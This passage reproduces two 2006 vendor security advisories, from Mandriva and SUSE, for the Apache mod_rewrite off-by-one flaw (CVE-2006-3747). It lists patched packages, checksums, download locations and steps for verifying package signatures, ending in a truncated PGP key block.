 Affected: 2006.0, Corporate 3.0, Multi Network Firewall 2.0
 _______________________________________________________________________
 
 Problem Description:
 
 Mark Dowd, of McAffee Avert Labs, discovered a potential remotely
 exploitable off-by-one flaw in Apache's mod_rewrite ldap scheme
 handling.
 
 In order for this to be exploitable, a number of conditions need to be
 met including a) running a vulnerable version of Apache (1.3.28+,
 2.0.46+, or 2.2.0+), b) enabling mod_rewrite, c) having a rewrite
 rule that the remote user can influence the beginning of, and d) a
 particular stack frame layout.
 
 By default, RewriteEngine is not enabled in Mandriva Linux Apache
 packages, and no RewriteRules are defined.
 
 Updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 ebae509678a2c96c28a73630b0c30f23  2006.0/RPMS/apache-base-2.0.54-13.3.20060mdk.i586.rpm
 ae7f7ab76fc982e61acb61eda6799299  2006.0/RPMS/apache-devel-2.0.54-13.3.20060mdk.i586.rpm
 1c5a8110c41c4c35bdc73e6c9b58ba9a  2006.0/RPMS/apache-mod_cache-2.0.54-13.3.20060mdk.i586.rpm
 4fcc04bd44e4000f6550e91b79d3c0ca  2006.0/RPMS/apache-mod_dav-2.0.54-13.3.20060mdk.i586.rpm
 76022b54360cfb38fca648d8120b8556  2006.0/RPMS/apache-mod_deflate-2.0.54-13.3.20060mdk.i586.rpm
 1066b0d30d2e39515fef3bb54b5bce5b  2006.0/RPMS/apache-mod_disk_cache-2.0.54-13.3.20060mdk.i586.rpm
 dde5b8b2072610fb00c734a2e1e9c22a  2006.0/RPMS/apache-mod_file_cache-2.0.54-13.3.20060mdk.i586.rpm
 253da3436b3babcabcb3abb3d1ff7af7  2006.0/RPMS/apache-mod_ldap-2.0.54-13.3.20060mdk.i586.rpm
 f0243852a659fef7c03de0c52cccde06  2006.0/RPMS/apache-mod_mem_cache-2.0.54-13.3.20060mdk.i586.rpm
 58949e068479c1f93505e74cba4cdeaa  2006.0/RPMS/apache-mod_proxy-2.0.54-13.3.20060mdk.i586.rpm
 27d44a61a8dab8c663977e84e60be6c7  2006.0/RPMS/apache-modules-2.0.54-13.3.20060mdk.i586.rpm
 f579d113efcc894ee37d5a46b30ff0a6  2006.0/RPMS/apache-mod_userdir-2.0.54-13.3.20060mdk.i586.rpm
 f4c30b2c8094d37e0298d491b7d12bba  2006.0/RPMS/apache-mpm-peruser-2.0.54-13.3.20060mdk.i586.rpm
 8371dd810a4e1062d3e58beaedd76aac  2006.0/RPMS/apache-mpm-prefork-2.0.54-13.3.20060mdk.i586.rpm
 60414cc8da66fb5aef97a1fc2dc84527  2006.0/RPMS/apache-mpm-worker-2.0.54-13.3.20060mdk.i586.rpm
 877e93cc1f5e623dc4e41a61242f986c  2006.0/RPMS/apache-source-2.0.54-13.3.20060mdk.i586.rpm
 0a5859b475b8cb95ff24315da7bafba4  2006.0/SRPMS/apache-2.0.54-13.3.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 ec96c0234417cf8ab9ad4291f43afcd2  x86_64/2006.0/RPMS/apache-base-2.0.54-13.3.20060mdk.x86_64.rpm
 c5d0a609cb8d301f0bde876b57e03043  x86_64/2006.0/RPMS/apache-devel-2.0.54-13.3.20060mdk.x86_64.rpm
 e9b4613c323e744a5c92e363f088d310  x86_64/2006.0/RPMS/apache-mod_cache-2.0.54-13.3.20060mdk.x86_64.rpm
 fba9d1c2ef3bf9598155441cfd396a5c  x86_64/2006.0/RPMS/apache-mod_dav-2.0.54-13.3.20060mdk.x86_64.rpm
 75b2ca971f394d2d3711554adb15ffa2  x86_64/2006.0/RPMS/apache-mod_deflate-2.0.54-13.3.20060mdk.x86_64.rpm
 fa572adae5767f3151ae48789a9fae00  x86_64/2006.0/RPMS/apache-mod_disk_cache-2.0.54-13.3.20060mdk.x86_64.rpm
 aab5e0e796252e752393be0383e37322  x86_64/2006.0/RPMS/apache-mod_file_cache-2.0.54-13.3.20060mdk.x86_64.rpm
 e413ad22fa7b802fcb84931d7634bfe2  x86_64/2006.0/RPMS/apache-mod_ldap-2.0.54-13.3.20060mdk.x86_64.rpm
 1a9ca26d7b699bef7c39c3bfd8c8f469  x86_64/2006.0/RPMS/apache-mod_mem_cache-2.0.54-13.3.20060mdk.x86_64.rpm
 726edc13662c0642f0e09fa800ee1294  x86_64/2006.0/RPMS/apache-mod_proxy-2.0.54-13.3.20060mdk.x86_64.rpm
 3236c11431b1ac898850fecc22b14136  x86_64/2006.0/RPMS/apache-modules-2.0.54-13.3.20060mdk.x86_64.rpm
 d5e066bed00e53dff692abf34a9870f1  x86_64/2006.0/RPMS/apache-mod_userdir-2.0.54-13.3.20060mdk.x86_64.rpm
 2b15cdeed5590d6510f9889337680375  x86_64/2006.0/RPMS/apache-mpm-peruser-2.0.54-13.3.20060mdk.x86_64.rpm
 0fc37bbfd509933b68460dca2c33b1ac  x86_64/2006.0/RPMS/apache-mpm-prefork-2.0.54-13.3.20060mdk.x86_64.rpm
 f6ba45f856a7b0ae79ea3bac4b5adfc0  x86_64/2006.0/RPMS/apache-mpm-worker-2.0.54-13.3.20060mdk.x86_64.rpm
 ec72f9d159ea8ea0b8b0cafd5946f49c  x86_64/2006.0/RPMS/apache-source-2.0.54-13.3.20060mdk.x86_64.rpm
 0a5859b475b8cb95ff24315da7bafba4  x86_64/2006.0/SRPMS/apache-2.0.54-13.3.20060mdk.src.rpm

 Corporate 3.0:
 566a5494c3a14c5e176a750a7997869e  corporate/3.0/RPMS/apache-1.3.29-1.5.C30mdk.i586.rpm
 cebb813717c0f08571fee33e07f42bc1  corporate/3.0/RPMS/apache2-2.0.48-6.13.C30mdk.i586.rpm
 3fa46c76c1a5a263317b4799848d7e6c  corporate/3.0/RPMS/apache2-common-2.0.48-6.13.C30mdk.i586.rpm
 527c568c24872c6f964ca6c9e36ec118  corporate/3.0/RPMS/apache2-devel-2.0.48-6.13.C30mdk.i586.rpm
 115bdb5fd40b900f0ef0d2473f59948a  corporate/3.0/RPMS/apache2-manual-2.0.48-6.13.C30mdk.i586.rpm
 a238d2e3001cc92838c6deb6d3572f38  corporate/3.0/RPMS/apache2-mod_cache-2.0.48-6.13.C30mdk.i586.rpm
 fce77bec697fba16111c21abae012e45  corporate/3.0/RPMS/apache2-mod_dav-2.0.48-6.13.C30mdk.i586.rpm
 19df98830307120d322139909c72521c  corporate/3.0/RPMS/apache2-mod_deflate-2.0.48-6.13.C30mdk.i586.rpm
 bdf826b0d24df2782efe7a533e2bef0c  corporate/3.0/RPMS/apache2-mod_disk_cache-2.0.48-6.13.C30mdk.i586.rpm
 7d0135ffdf47f14bc1f247429cb817e4  corporate/3.0/RPMS/apache2-mod_file_cache-2.0.48-6.13.C30mdk.i586.rpm
 1dfd528875f1a013ecc649f3496a9319  corporate/3.0/RPMS/apache2-mod_ldap-2.0.48-6.13.C30mdk.i586.rpm
 792af80955c5bbf0db335d53b1fca13c  corporate/3.0/RPMS/apache2-mod_mem_cache-2.0.48-6.13.C30mdk.i586.rpm
 fbcdffd89ebe26e8f55936eefd836e48  corporate/3.0/RPMS/apache2-mod_proxy-2.0.48-6.13.C30mdk.i586.rpm
 c85871f0a60bbf10f9af9805e97dba34  corporate/3.0/RPMS/apache2-mod_ssl-2.0.48-6.13.C30mdk.i586.rpm
 d710c931c7e7005cfe77ddc0ef584947  corporate/3.0/RPMS/apache2-modules-2.0.48-6.13.C30mdk.i586.rpm
 5a07d3b609ce4613755f031bb4025819  corporate/3.0/RPMS/apache2-source-2.0.48-6.13.C30mdk.i586.rpm
 c17733e580d25fa041886e9cd35b9322  corporate/3.0/RPMS/apache-devel-1.3.29-1.5.C30mdk.i586.rpm
 9b826a4fa35a3235ed3aedfdf0b44609  corporate/3.0/RPMS/apache-modules-1.3.29-1.5.C30mdk.i586.rpm
 9d9a2747b98ec88394a4a59390b7a7c4  corporate/3.0/RPMS/apache-source-1.3.29-1.5.C30mdk.i586.rpm
 9113740cc7abbbec586137bb7018c270  corporate/3.0/RPMS/libapr0-2.0.48-6.13.C30mdk.i586.rpm
 3f6688dd5ba8982ca9d1277b78ac119b  corporate/3.0/SRPMS/apache-1.3.29-1.5.C30mdk.src.rpm
 d6d2282793e20880c3975ea80b907674  corporate/3.0/SRPMS/apache2-2.0.48-6.13.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 617acd26211661d3b93d34b415b13eb0  x86_64/corporate/3.0/RPMS/apache-1.3.29-1.5.C30mdk.x86_64.rpm
 b38b1f3efbc0795b433a994abba9a8f7  x86_64/corporate/3.0/RPMS/apache2-2.0.48-6.13.C30mdk.x86_64.rpm
 2adc7e3a0de0c9cec65f6a125bade13a  x86_64/corporate/3.0/RPMS/apache2-common-2.0.48-6.13.C30mdk.x86_64.rpm
 cad9c4879077026df3e1db8dd30bf1c9  x86_64/corporate/3.0/RPMS/apache2-devel-2.0.48-6.13.C30mdk.x86_64.rpm
 31b72d855febf7bd27f755a5252a225f  x86_64/corporate/3.0/RPMS/apache2-manual-2.0.48-6.13.C30mdk.x86_64.rpm
 2301e27667996ee9dd9f7c54bbbf7b38  x86_64/corporate/3.0/RPMS/apache2-mod_cache-2.0.48-6.13.C30mdk.x86_64.rpm
 0b26b6262eb76e6cae28096bccbe525c  x86_64/corporate/3.0/RPMS/apache2-mod_dav-2.0.48-6.13.C30mdk.x86_64.rpm
 cd00509b19c01e89743506945d79b741  x86_64/corporate/3.0/RPMS/apache2-mod_deflate-2.0.48-6.13.C30mdk.x86_64.rpm
 40172eb4e8f02bf5687c91185cdc823c  x86_64/corporate/3.0/RPMS/apache2-mod_disk_cache-2.0.48-6.13.C30mdk.x86_64.rpm
 07d0bbfdb795c4303a1c9a840f428154  x86_64/corporate/3.0/RPMS/apache2-mod_file_cache-2.0.48-6.13.C30mdk.x86_64.rpm
 8798865d801abf9ffc062f29f51ae34b  x86_64/corporate/3.0/RPMS/apache2-mod_ldap-2.0.48-6.13.C30mdk.x86_64.rpm
 025d53b2271429d014017a9af763dc8a  x86_64/corporate/3.0/RPMS/apache2-mod_mem_cache-2.0.48-6.13.C30mdk.x86_64.rpm
 f9f9c0f581ffe083f9ce3d8506e054a8  x86_64/corporate/3.0/RPMS/apache2-mod_proxy-2.0.48-6.13.C30mdk.x86_64.rpm
 a01c2c6b91bb6c237f40b1bbf8fda5df  x86_64/corporate/3.0/RPMS/apache2-mod_ssl-2.0.48-6.13.C30mdk.x86_64.rpm
 79b6ee6c17e04ec63fda6f81bc5a5501  x86_64/corporate/3.0/RPMS/apache2-modules-2.0.48-6.13.C30mdk.x86_64.rpm
 63fa68ca230b4f1e704912ed1ae28522  x86_64/corporate/3.0/RPMS/apache2-source-2.0.48-6.13.C30mdk.x86_64.rpm
 4cc0f5c8c21edb50cbb2e3170053fea3  x86_64/corporate/3.0/RPMS/apache-devel-1.3.29-1.5.C30mdk.x86_64.rpm
 ea1ccb27856c858ed0093825b0d9157c  x86_64/corporate/3.0/RPMS/apache-modules-1.3.29-1.5.C30mdk.x86_64.rpm
 3e1ef8a32185108b14b392597d652634  x86_64/corporate/3.0/RPMS/apache-source-1.3.29-1.5.C30mdk.x86_64.rpm
 365d9820028c26f3b9de6bd75056c383  x86_64/corporate/3.0/RPMS/lib64apr0-2.0.48-6.13.C30mdk.x86_64.rpm
 3f6688dd5ba8982ca9d1277b78ac119b  x86_64/corporate/3.0/SRPMS/apache-1.3.29-1.5.C30mdk.src.rpm
 d6d2282793e20880c3975ea80b907674  x86_64/corporate/3.0/SRPMS/apache2-2.0.48-6.13.C30mdk.src.rpm

 Multi Network Firewall 2.0:
 bc009b09567626e607218d70f260cafa  mnf/2.0/RPMS/apache2-2.0.48-6.13.M20mdk.i586.rpm
 f06196a72fbbb40f897f701f63defe74  mnf/2.0/RPMS/apache2-common-2.0.48-6.13.M20mdk.i586.rpm
 49fed15cff4348b2bd162a2b612a7c09  mnf/2.0/RPMS/apache2-devel-2.0.48-6.13.M20mdk.i586.rpm
 e0848b25ece016c968d1f03900d05b25  mnf/2.0/RPMS/apache2-manual-2.0.48-6.13.M20mdk.i586.rpm
 d2adbf4cb660b2e8b8414b4b12995ee9  mnf/2.0/RPMS/apache2-mod_cache-2.0.48-6.13.M20mdk.i586.rpm
 500fcb76763df7d1999c9c30aec6f339  mnf/2.0/RPMS/apache2-mod_dav-2.0.48-6.13.M20mdk.i586.rpm
 8899cba4166e9aa426b71a16ebce4399  mnf/2.0/RPMS/apache2-mod_deflate-2.0.48-6.13.M20mdk.i586.rpm
 9d118e749e50e7945d8f4f304c822433  mnf/2.0/RPMS/apache2-mod_disk_cache-2.0.48-6.13.M20mdk.i586.rpm
 a2b22dfea4eee15fbd47bad5b625b4c3  mnf/2.0/RPMS/apache2-mod_file_cache-2.0.48-6.13.M20mdk.i586.rpm
 6e88df28fc77bf2bbc8c665d610a7391  mnf/2.0/RPMS/apache2-mod_ldap-2.0.48-6.13.M20mdk.i586.rpm
 827ef114c1801e4139571b0f87115a78  mnf/2.0/RPMS/apache2-mod_mem_cache-2.0.48-6.13.M20mdk.i586.rpm
 d10842201c502da141df43d21c7840b3  mnf/2.0/RPMS/apache2-mod_proxy-2.0.48-6.13.M20mdk.i586.rpm
 17be96783ed2c46212aa18014c75c00e  mnf/2.0/RPMS/apache2-mod_ssl-2.0.48-6.13.M20mdk.i586.rpm
 5abc11514ddb9c5235a3a409bc98860a  mnf/2.0/RPMS/apache2-modules-2.0.48-6.13.M20mdk.i586.rpm
 c15499d0be66da28b0030ce0ba458399  mnf/2.0/RPMS/apache2-source-2.0.48-6.13.M20mdk.i586.rpm
 ecc2534b32ea7b9dcc08b0bc27ad2f79  mnf/2.0/RPMS/libapr0-2.0.48-6.13.M20mdk.i586.rpm
 52f87a940c2058d8d5da18bc53f78e25  mnf/2.0/SRPMS/apache2-2.0.48-6.13.M20mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEyiuBmqjQ0CJFipgRAjfyAJ9gYl1291imG1EwXNjOlResx6RgagCfR2Wz
mPbs0TLuI3ZpwgUWGqCGhkU=
=H0Ni
-----END PGP SIGNATURE-----

    

- 漏洞信息 (F48768)

SUSE-SA-2006-043.txt (PacketStormID:F48768)
2006-08-03 00:00:00
 
advisory
linux,suse
CVE-2005-3352,CVE-2006-3747
[点击下载]

SUSE Security Announcement SUSE-SA:2006:043 - The mod_rewrite vulnerability in Apache has been patched.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________

                        SUSE Security Announcement

        Package:                apache,apache2
        Announcement ID:        SUSE-SA:2006:043
        Date:                   Fri, 28 Jul 2006 17:00:00 +0000
        Affected Products:      SLE SDK 10
                                SUSE LINUX 10.1
                                SUSE LINUX 10.0
                                SUSE LINUX 9.3
                                SUSE LINUX 9.2
                                SUSE SLES 10
                                SUSE SLES 9
        Vulnerability Type:     remote denial of service
        Severity (1-10):        6
        SUSE Default Package:   yes
        Cross-References:       CVE-2005-3352, CVE-2006-3747

    Content of This Advisory:
        1) Security Vulnerability Resolved:
             Apache off by one security problem
           Problem Description
        2) Solution or Work-Around
        3) Special Instructions and Notes
        4) Package Location and Checksums
        5) Pending Vulnerabilities, Solutions, and Work-Arounds:
            See SUSE Security Summary Report.
        6) Authenticity Verification and Additional Information

______________________________________________________________________________

1) Problem Description and Brief Discussion

   The following security problem was fixed in the Apache and Apache 2
   web servers:

   mod_rewrite: Fix an off-by-one security problem in the ldap scheme
   handling. For some RewriteRules this could lead to a pointer being
   written out of bounds. Depending on stack alignment this could be
   used to potentially execute code.

   The mod_rewrite module is not enabled per default in our packages.

   This problem is tracked by the Mitre CVE ID CVE-2006-3747.

   A more detailed description of this problem is available in:

	   http://www.apache.org/dist/httpd/Announcement2.0.html

   For SUSE Linux 10.0, 10.1 and SUSE Linux Enterprise 10 additionally
   a old bug was fixed that we missed to forward port to the Apache 2.2
   packages:

   mod_imap: Fixes a cross-site-scripting bug in the imagemap module.
   This issue is tracked by the Mitre CVE ID CVE-2005-3352.

2) Solution or Work-Around

   There is no known workaround, please install the update packages.

3) Special Instructions and Notes

   Please close and restart all running instances of Apache after the update.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

     rpm -Fhv <file.rpm>

   to apply the update, replacing <file.rpm> with the filename of the
   downloaded RPM package.


   x86 Platform:

   SUSE LINUX 10.1:
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/apache2-2.2.0-21.7.i586.rpm
          124342d5311b318586d91d12117bdd2a
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/apache2-prefork-2.2.0-21.7.i586.rpm
          4a73ae89777943f4127743f817f0a0a5
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/apache2-worker-2.2.0-21.7.i586.rpm
          1905af7f606986f1818ebed5bd3382d5

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/apache2-2.0.54-10.5.i586.rpm
          adf6c8665b9f0f36c6a7720a8f1bfad1
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/apache2-prefork-2.0.54-10.5.i586.rpm
          1cbcec6896dc46504140177b48ca014d
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/apache2-worker-2.0.54-10.5.i586.rpm
          f721e397c518cc6160886a1296e5a109

   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/apache2-2.0.53-9.12.i586.rpm
          e6ae2ee1353c1f1c31c0595b60d18137
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/apache2-prefork-2.0.53-9.12.i586.rpm
          cb02c5f97671d2ab0a64215ed9987c2f
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/apache2-worker-2.0.53-9.12.i586.rpm
          b8872991cf54d99659e60d860d0c44e8

   SUSE LINUX 9.2:
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/apache2-2.0.50-7.14.i586.rpm
          9365d403839e7c0740aae1e2f1b6cdfc
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/apache2-prefork-2.0.50-7.14.i586.rpm
          97d506d68996f80ffaaaa6494a127f7c
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/apache2-worker-2.0.50-7.14.i586.rpm
          f649e8eb98d43d6a44231f0c7453c9b2

   Power PC Platform:

   SUSE LINUX 10.1:
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/apache2-2.2.0-21.7.ppc.rpm
          133b02c7a3a52a2bf144ece351ba00a1
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/apache2-prefork-2.2.0-21.7.ppc.rpm
          099056b7a0f634ff1daf583ce2163839
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/apache2-worker-2.2.0-21.7.ppc.rpm
          a22ae78408cedfea6d66362509d3c721

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/apache2-2.0.54-10.5.ppc.rpm
          16a119e6dab8e972a992ef37bd9973aa
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/apache2-prefork-2.0.54-10.5.ppc.rpm
          fcb8c3ca92f1b9a39791f51aad5b8907
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/apache2-worker-2.0.54-10.5.ppc.rpm
          0f5dff953aea37964958bc0ed8932412

   x86-64 Platform:

   SUSE LINUX 10.1:
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/x86_64/apache2-2.2.0-21.7.x86_64.rpm
          3ab36db089d7f3d60a7114820970afdd
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/x86_64/apache2-prefork-2.2.0-21.7.x86_64.rpm
          b7e9bc09fe9684292acf0e7ed0218b14
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/x86_64/apache2-worker-2.2.0-21.7.x86_64.rpm
          b6b1ab1c03073f7f2acc07a0231ea532

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/apache2-2.0.54-10.5.x86_64.rpm
          17c4bdc7577446bf45335ba58ebb3513
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/apache2-prefork-2.0.54-10.5.x86_64.rpm
          d55a93a86ae6b5bf037ee336d4307133
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/apache2-worker-2.0.54-10.5.x86_64.rpm
          e64fc86d3337913db0c22ffde3519a36

   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/apache2-2.0.53-9.12.x86_64.rpm
          d4996884e49ef11d27c97340efb6f079
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/apache2-prefork-2.0.53-9.12.x86_64.rpm
          5b599e78e59c7b59dc199777fe2c4eea
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/apache2-worker-2.0.53-9.12.x86_64.rpm
          09f0f1dc18761a8a902f2dc5ab166883

   SUSE LINUX 9.2:
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/apache2-2.0.50-7.14.x86_64.rpm
          595101ab05dfe5117ddab1d1f1463a28
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/apache2-prefork-2.0.50-7.14.x86_64.rpm
          112fe5dd14b66a4fbb82c3c5178bef69
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/apache2-worker-2.0.50-7.14.x86_64.rpm
          7c07b8b400e6ed13a4707c3ebe1eed3a

   Sources:

   SUSE LINUX 10.1:
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/src/apache2-2.2.0-21.7.src.rpm
          493d11cc099e975bc0974611cf936816

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/apache2-2.0.54-10.5.src.rpm
          b83da64c6ad0b76d7a3a8bf909d61d39

   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/apache2-2.0.53-9.12.src.rpm
          5d4c85c7f60ea5c73df0fba7d92bec35

   SUSE LINUX 9.2:
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/apache2-2.0.50-7.14.src.rpm
          2c4e95c0ebe9bee49dec733cbdeb42d3

   Our maintenance customers are notified individually. The packages are
   offered for installation from the maintenance web:

   SUSE SLES 10
     http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/90eac595ae9e6c7fbeab2e05fb53a852.html

   SLE SDK 10
     http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/90eac595ae9e6c7fbeab2e05fb53a852.html

   SUSE SLES 9
     http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/90eac595ae9e6c7fbeab2e05fb53a852.html
     http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/5d0c08a7586a4b960c62a9ab75e96a7c.html

______________________________________________________________________________

5) Pending Vulnerabilities, Solutions, and Work-Arounds:

   See SUSE Security Summary Report.
______________________________________________________________________________

6) Authenticity Verification and Additional Information

  - Announcement authenticity verification:

    SUSE security announcements are published via mailing lists and on Web
    sites. The authenticity and integrity of a SUSE security announcement is
    guaranteed by a cryptographic signature in each announcement. All SUSE
    security announcements are published with a valid signature.

    To verify the signature of the announcement, save it as text into a file
    and run the command

      gpg --verify <file>

    replacing <file> with the name of the file where you saved the
    announcement. The output for a valid signature looks like:

      gpg: Signature made <DATE> using RSA key ID 3D25D3D9
      gpg: Good signature from "SuSE Security Team <security@suse.de>"

    where <DATE> is replaced by the date the document was signed.

    If the security team's key is not contained in your key ring, you can
    import it from the first installation CD. To import the key, use the
    command

      gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc

  - Package authenticity verification:

    SUSE update packages are available on many mirror FTP servers all over the
    world. While this service is considered valuable and important to the free
    and open source software community, the authenticity and the integrity of
    a package needs to be verified to ensure that it has not been tampered
    with.

    There are two verification methods that can be used independently from
    each other to prove the authenticity of a downloaded file or RPM package:

    1) Using the internal gpg signatures of the rpm package
    2) MD5 checksums as provided in this announcement

    1) The internal rpm package signatures provide an easy way to verify the
       authenticity of an RPM package. Use the command

        rpm -v --checksig <file.rpm>

       to verify the signature of the package, replacing <file.rpm> with the
       filename of the RPM package downloaded. The package is unmodified if it
       contains a valid signature from build@suse.de with the key ID 9C800ACA.

       This key is automatically imported into the RPM database (on
       RPMv4-based distributions) and the gpg key ring of 'root' during
       installation. You can also find it on the first installation CD and at
       the end of this announcement.

    2) If you need an alternative means of verification, use the md5sum
       command to verify the authenticity of the packages. Execute the command

         md5sum <filename.rpm>

       after you downloaded the file from a SUSE FTP server or its mirrors.
       Then compare the resulting md5sum with the one that is listed in the
       SUSE security announcement. Because the announcement containing the
       checksums is cryptographically signed (by security@suse.de), the
       checksums show proof of the authenticity of the package if the
       signature of the announcement is valid. Note that the md5 sums
       published in the SUSE Security Announcements are valid for the
       respective packages only. Newer versions of these packages cannot be
       verified.

  - SUSE runs two security mailing lists to which any interested party may
    subscribe:

    suse-security@suse.com
        -   General Linux and SUSE security discussion.
            All SUSE security announcements are sent to this list.
            To subscribe, send an e-mail to
                <suse-security-subscribe@suse.com>.

    suse-security-announce@suse.com
        -   SUSE's announce-only mailing list.
            Only SUSE's security announcements are sent to this list.
            To subscribe, send an e-mail to
                <suse-security-announce-subscribe@suse.com>.

    For general information or the frequently asked questions (FAQ),
    send mail to <suse-security-info@suse.com> or
    <suse-security-faq@suse.com>.

    =====================================================================
    SUSE's security contact is <security@suse.com> or <security@suse.de>.
    The <security@suse.de> public key is listed below.
    =====================================================================
______________________________________________________________________________

    The information in this advisory may be distributed or reproduced,
    provided that the advisory is not modified in any way. In particular, the
    clear text signature should show proof of the authenticity of the text.

    SUSE Linux Products GmbH provides no warranties of any kind whatsoever
    with respect to the information contained in this security advisory.

Type Bits/KeyID     Date       User ID
pub  2048R/3D25D3D9 1999-03-06 SuSE Security Team <security@suse.de>
pub  1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build@suse.de>

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.2 (GNU/Linux)

mQENAzbhLQQAAAEIAKAkXHe0lWRBXLpn38hMHy03F0I4Sszmoc8aaKJrhfhyMlOA
BqvklPLE2f9UrI4Xc860gH79ZREwAgPt0pi6+SleNFLNcNFAuuHMLQOOsaMFatbz
JR9i4m/lf6q929YROu5zB48rBAlcfTm+IBbijaEdnqpwGib45wE/Cfy6FAttBHQh
1Kp+r/jPbf1mYAvljUfHKuvbg8t2EIQz/5yGp+n5trn9pElfQO2cRBq8LFpf1l+U
P7EKjFmlOq+Gs/fF98/dP3DfniSd78LQPq5vp8RL8nr/o2i7jkAQ33m4f1wOBWd+
cZovrKXYlXiR+Bf7m2hpZo+/sAzhd7LmAD0l09kABRG0JVN1U0UgU2VjdXJpdHkg
VGVhbSA8c2VjdXJpdHlAc3VzZS5kZT6JARUDBRA24S1H5Fiyh7HKPEUBAVcOB/9b
yHYji1/+4Xc2GhvXK0FSJN0MGgeXgW47yxDL7gmR4mNgjlIOUHZj0PEpVjWepOJ7
tQS3L9oP6cpj1Fj/XxuLbkp5VCQ61hpt54coQAvYrnT9rtWEGN+xmwejT1WmYmDJ
xG+EGBXKr+XP69oIUl1E2JO3rXeklulgjqRKos4cdXKgyjWZ7CP9V9daRXDtje63
Om8gwSdU/nCvhdRIWp/Vwbf7Ia8iZr9OJ5YuQl0DBG4qmGDDrvImgPAFkYFzwlqo
choXFQ9y0YVCV41DnR+GYhwl2qBd81T8aXhihEGPIgaw3g8gd8B5o6mPVgl+nJqI
BkEYGBusiag2pS6qwznZiQEVAwUQNuEtBHey5gA9JdPZAQFtOAf+KVh939b0J94u
v/kpg4xs1LthlhquhbHcKNoVTNspugiC3qMPyvSX4XcBr2PC0cVkS4Z9PY9iCfT+
x9WM96g39dAF+le2CCx7XISk9XXJ4ApEy5g4AuK7NYgAJd39PPbERgWnxjxir9g0
Ix30dS30bW39D+3NPU5Ho9TD/B7UDFvYT5AWHl3MGwo3a1RhTs6sfgL7yQ3U+mvq
MkTExZb5mfN1FeaYKMopoI4VpzNVeGxQWIz67VjJHVyUlF20ekOz4kWVgsxkc8G2
saqZd6yv2EwqYTi8BDAduweP33KrQc4KDDommQNDOXxaKOeCoESIdM4p7Esdjq1o
L0oixF12CohGBBARAgAGBQI7HmHDAAoJEJ5A4xAACqukTlQAoI4QzP9yjPohY7OU
F7J3eKBTzp25AJ42BmtSd3pvm5ldmognWF3Trhp+GYkAlQMFEDe3O8IWkDf+zvyS
FQEBAfkD/3GG5UgJj18UhYmh1gfjIlDcPAeqMwSytEHDENmHC+vlZQ/p0mT9tPiW
